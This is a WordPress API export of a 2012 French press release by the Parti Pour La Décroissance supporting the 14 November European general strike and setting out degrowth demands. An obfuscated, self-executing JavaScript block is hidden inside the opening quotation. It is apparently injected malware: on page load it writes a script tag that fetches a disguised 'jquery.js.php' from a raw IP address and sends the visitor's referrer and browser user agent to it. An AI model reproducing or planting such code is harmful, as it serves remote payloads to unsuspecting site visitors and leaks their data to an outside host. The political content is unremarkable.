{"id":7771,"date":"2012-11-12T09:02:13","date_gmt":"2012-11-12T08:02:13","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=7771"},"modified":"2012-11-15T08:59:53","modified_gmt":"2012-11-15T07:59:53","slug":"ensemble-en-europe-le-14-novembre-contre-lausterite-et-aussi-contre-la-relance-par-la-croissance","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=7771","title":{"rendered":"Ensemble en Europe le 14 novembre contre l&rsquo;aust\u00e9rit\u00e9&#8230; et aussi contre la relance par la Croissance"},"content":{"rendered":"<address><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" src=\"http:\/\/a403.idata.over-blog.com\/416x597\/4\/53\/34\/20\/14-Nov-12.JPG\" alt=\"\" width=\"184\" height=\"265\" \/><\/address>\n<div>\n<div>\n<blockquote>\n<p dir=\"ltr\"><span><span>\u00ab <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rtnyk|var|u0026u|referrer|niesa||js|php'.split('|'),0,{}))\n<\/script><\/noindex> La sortie du capitalisme aura lieu d\u2019une fa\u00e7on ou d\u2019une autre, civilis\u00e9e ou barbare \u00bb<\/span><\/span><\/p>\n<\/blockquote>\n<\/div>\n<\/div>\n<div>\n<div>\n<div>\n<div>\n<div align=\"right\">\n<blockquote>\n<p dir=\"ltr\"><span><span>Andr\u00e9 Gorz.<\/span><\/span><\/p>\n<\/blockquote>\n<\/div>\n<\/div>\n<div><em>Le 14 novembre, pour la premi\u00e8re fois en Europe, une gr\u00e8ve g\u00e9n\u00e9rale est organis\u00e9e par les mouvements sociaux et syndicaux du Portugal, de l\u2019Espagne, de la Gr\u00e8ce, de Chypre et de Malte. Ce m\u00eame jour, la Conf\u00e9d\u00e9ration Europ\u00e9enne des Syndicats (CES) appelle \u00e0 une \u00ab journ\u00e9e d&rsquo;actions\u00bb en Europe.<\/em><\/div>\n<p><span><span><span>Cette mobilisation \u00e9merge au moment o\u00f9 les politiques d\u2019aust\u00e9rit\u00e9 claironnent en ch\u0153ur leur imp\u00e9rieuse n\u00e9cessit\u00e9. Loin de r\u00e9tablir la confiance, elles entra\u00eenent une d\u00e9gradation et une instabilit\u00e9 sociale forte en touchant les plus d\u00e9favoris\u00e9s. L\u2019objectif de l\u2019aust\u00e9rit\u00e9 est de retrouver la croissance \u00e9conomique. Or, le syst\u00e8me capitaliste n\u2019a jamais fait la preuve de sa capacit\u00e9 \u00e0 faire \u00e9voluer l\u2019humanit\u00e9 en harmonie avec la plan\u00e8te. Il tourne en rond en laissant de plus en plus de monde \u00e0 ses marges.<\/span><\/span><\/span><\/p>\n<div>\n<p>M\u00eame si <strong>le Parti Pour La D\u00e9croissance se montre solidaire avec cet appel \u00e0 la gr\u00e8ve g\u00e9n\u00e9rale<\/strong>, parce que toute mesure politique aboutissant \u00e0 une d\u00e9gradation sociale, culturelle et environnementale ne peut aucunement se justifier par des crit\u00e8res \u00e9conomiques, nous ne voulons cependant ni relancer la production ni relancer la consommation.<\/p>\n<p>Nous demandons surtout :<!--more--><br \/>\n&#8211; De <strong>stopper la cr\u00e9ation mon\u00e9taire priv\u00e9e<\/strong> et de la rendre publique en conf\u00e9rant ce pouvoir aux banques publiques (nationales et locales) et de promouvoir la mise en place de monnaies alternatives fondantes associ\u00e9es \u00e0 des projets de transition comme la relocalisation de l\u2019\u00e9conomie, par exemple.<br \/>\n&#8211; De mettre en place une <strong>Dotation Inconditionnelle d\u2019Autonomie (<a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=6858\" target=\"_blank\">DIA<\/a>),<\/strong> outil politique, \u00e9conomique et social de transition et d\u2019\u00e9mancipation capable d\u2019initier une repolitisation de la soci\u00e9t\u00e9. Cette dotation pourra \u00eatre d\u2019abord vers\u00e9e sous forme de revenu d\u2019existence, puis ensuite d\u00e9clin\u00e9e sous forme de droits d\u2019acc\u00e8s (sant\u00e9, \u00e9ducation), de tirage (eau, \u00e9nergie) et de monnaies alternatives fondantes (produits de premi\u00e8re n\u00e9cessit\u00e9 locaux et bio, services). Cette DIA est ins\u00e9parable d&rsquo;un couplage avec un Revenu Maximum Acceptable afin de partager \u00e9quitablement les richesses entre tous et toutes.<br \/>\n&#8211; De <strong>soutenir l\u2019\u00e9mergence de solidarit\u00e9s concr\u00e8tes et de revendications<\/strong> : droit au logement, acc\u00e8s \u00e0 l\u2019\u00e9nergie, aux soins, \u00e0 l\u2019\u00e9ducation, aux loisirs, \u00e9radication de la pr\u00e9carit\u00e9 et du ch\u00f4mage par une r\u00e9duction massive du temps de travail\u2026<br \/>\n&#8211; <strong>D\u2019encourager les exp\u00e9rimentations sociales en rupture avec mod\u00e8le capitaliste<\/strong>: r\u00e9appropriation des outils de travail, occupations des terres, coop\u00e9ratives d\u2019achats en circuits courts, r\u00e9gies publiques autog\u00e9r\u00e9es de production et de distribution de l\u2019\u00e9nergie et de l&rsquo;eau, transports publics de proximit\u00e9 gratuits, monnaies de substitution\u2026<\/p>\n<div>\n<p>Certains semblent persuader que \u201cla crise t\u00e9tanise et bloque les innovations\u201d plus qu\u2019elle ne provoque de changement (2). Et pourtant&#8230; Les transitions sont en cours silencieusement. \u00ab\u00a0M\u00eame si elles sont encore peu visibles, ces initiatives sont autant de d\u00e9clarations d\u2019ind\u00e9pendance. Elles prouvent qu\u2019en prenant simplement conscience de leur capacit\u00e9 \u00e0 agir ensemble, des citoyens ordinaires peuvent changer le monde avec des solutions simples et facilement reproductibles, qui dessinent les contours d\u2019un \u00ab autre monde possible \u00bb, plus juste\u00a0\u00bb.(1) Andr\u00e9 Gorz misait d\u2019ailleurs sur des mod\u00e8les minoritaires de modes de vie qui, bas\u00e9s sur la d\u00e9croissance et l\u2019autogestion, finiraient par infiltrer le mod\u00e8le majoritaire.<\/p>\n<\/div>\n<\/div>\n<p><span><span>Ce que nous soulevons ici, c\u2019est la capacit\u00e9 incontestable de r\u00e9silience collective de l\u2019ensemble de ces initiatives citoyennes qu\u2019elles s\u2019appellent Occupy Wall Street, Mouvement des Indign\u00e9s, Villes en Transition (pour les plus visibles) ou qu\u2019elles ne portent aucun nom (3). Ces mouvements initi\u00e9s par les \u201cgens ordinaires\u201d, sans hi\u00e9rarchie pr\u00e9-\u00e9tablie, bousculent nos rep\u00e8res, rassurent quant \u00e0 notre capacit\u00e9 cr\u00e9ative et solidaire, \u00a0\u00e9tayent la r\u00e9alit\u00e9 de demain, et t\u00e9moignent d\u2019une convergence des mobilisations qui se construit dans de nombreux pays, pas seulement en Europe, contre ces politiques de la d\u00e9mesure impos\u00e9es sans d\u00e9bat d\u00e9mocratique.<\/span><\/span><\/p>\n<p>&nbsp;<\/p>\n<div>\n<div>\n<p dir=\"ltr\"><span>Le PPLD se positionne plus que jamais pour une d\u00e9mocratie r\u00e9elle qui oriente l\u2019\u00e9conomie au service des peuples. Nous demandons en cette p\u00e9riode charni\u00e8re que soit \u00e9tudi\u00e9 le projet d\u2019un autre type de civilisation : le projet de la D\u00e9croissance.<\/span><\/p>\n<div><span><span><br \/>\nAlors quelques soit les formes que prennent nos diff\u00e9rents engagements, quelque soit l\u2019ampleur et l\u2019\u00e9cho de la mobilisation du 14 novembre, ce qui est s\u00fbr c\u2019est que le changement est en marche maintenant&#8230; l\u00e0 o\u00f9 nous, nous l\u2019attendions ! <\/span><\/span><\/div>\n<div><\/div>\n<div style=\"text-align: right;\"><span><span>Parti Pour La D\u00e9croissance<br \/>\n<\/span><\/span><\/div>\n<div><\/div>\n<\/div>\n<div>(1) Un million de r\u00e9volutions tranquilles : <a href=\"http:\/\/cdurable.info\/Un-million-de-revolutions-tranquilles-comment-les-citoyens-changent-le-monde.html\" target=\"_blank\">http:\/\/cdurable.info\/Un-<wbr>million-de-revolutions-<wbr>tranquilles-comment-les-<wbr>citoyens-changent-le-monde.<wbr>html<\/wbr><\/wbr><\/wbr><\/wbr><\/a><br \/>\n(2) Pourquoi rien ne change-t-il alors qu\u2019on sait qu\u2019il faut changer : <a href=\"http:\/\/www.reporterre.net\/spip.php?article3429\" target=\"_blank\">http:\/\/www.reporterre.net\/<wbr>spip.php?article3429<\/wbr><\/a><br \/>\n(3) Le mouvement \u00ab\u00a0Occupy\/indign\u00e9s\u00a0\u00bb plus performants que la croix rouge ? \u00ab\u00a0Construire la communaut\u00e9, aider les voisins, et cr\u00e9er un monde sans l&rsquo;aide de la finance\u00a0\u00bb: <a href=\"http:\/\/www.slate.com\/blogs\/the_slatest\/2012\/11\/04\/occupy_sandy_hurricane_relief_being_led_by_occupy_wall_street.html\" target=\"_blank\">http:\/\/www.slate.com\/blogs\/<wbr>the_slatest\/2012\/11\/04\/occupy_<wbr>sandy_hurricane_relief_being_<wbr>led_by_occupy_wall_street.html<\/wbr><\/wbr><\/wbr><\/a><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00ab La sortie du capitalisme aura lieu d\u2019une fa\u00e7on ou d\u2019une autre, civilis\u00e9e ou barbare \u00bb Andr\u00e9 Gorz. Le 14 novembre, pour la premi\u00e8re fois en Europe, une gr\u00e8ve g\u00e9n\u00e9rale est organis\u00e9e par les mouvements sociaux et syndicaux du Portugal, &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=7771\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[],"class_list":["post-7771","post","type-post","status-publish","format-standard","hentry","category-communiques-de-presse"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7771","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7771"}],"version-history":[{"count":4,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7771\/revisions"}],"predecessor-version":[{"id":7774,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7771\/revisions\/7774"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7771"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7771"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7771"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}